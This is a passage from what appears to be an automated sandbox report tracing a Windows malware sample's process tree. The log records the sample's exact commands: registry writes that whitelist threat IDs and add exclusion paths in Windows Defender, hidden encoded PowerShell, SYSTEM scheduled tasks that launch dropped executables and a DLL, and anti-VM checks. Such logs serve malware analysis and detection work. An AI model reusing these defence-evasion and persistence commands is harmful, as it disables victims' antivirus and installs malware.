    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5696
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5668
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5244
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3456
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1800
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3412
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3964
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2948
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5664
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2152
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3620
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5356
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5304
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3096
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2312
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4380
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4300
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3680
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gJCboylpO" /SC once /ST 00:05:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:5784
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1748
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gJCboylpO"
  2⤵
  PID:4348
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gJCboylpO"
  2⤵
  PID:1800
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "WKALCIrwIEiqhKBsn" /SC once /ST 00:12:20 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\NUDcnOd.exe\" y7 /eTdCdidVE 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:64
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "WKALCIrwIEiqhKBsn"
  2⤵
  PID:1084
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 1052
  2⤵
  - Program crash
  PID:4300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:2000

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2668

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4796

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5668

C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
1⤵
- Executes dropped EXE
PID:6108

C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\NUDcnOd.exe
C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\NUDcnOd.exe y7 /eTdCdidVE 385118 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3096
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:2592
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:3632
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5304
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:1948
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5468
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:2836
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5888
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5920
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5232
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4500
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:5828
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:2872
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5812
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:2140
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:4648
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:4908
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:2780
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bqGGCwwWIommTRgeuN"
  2⤵
  PID:5276
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:64
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:2176
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:2940
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:836
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:2872
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JipyTrDkU\DljpMb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jiLwFdOzPPQiWLm" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:4604
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "jiLwFdOzPPQiWLm2" /F /xml "C:\Program Files (x86)\JipyTrDkU\RFhKjln.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2876
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "jiLwFdOzPPQiWLm"
  2⤵
  PID:5788
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "jiLwFdOzPPQiWLm"
  2⤵
  PID:3984
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "EyAjTIEydjCaoB" /F /xml "C:\Program Files (x86)\tegRANPZONsU2\yAcPkaA.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3832
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "nwujZhVsLEYxr2" /F /xml "C:\ProgramData\fcblnlcRRSrBhAVB\PMXKGbw.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:1508
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "njgsfWmNUCIAXOmvm2" /F /xml "C:\Program Files (x86)\krdeMCnRKomDOvwVunR\oJzhGzm.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5884
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ZXdYLGWImophNcyfuyr2" /F /xml "C:\Program Files (x86)\YLgKyOFzWxOqC\PSFpMVF.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3996
- C:\Windows\SysWOW64\schtasks.exe
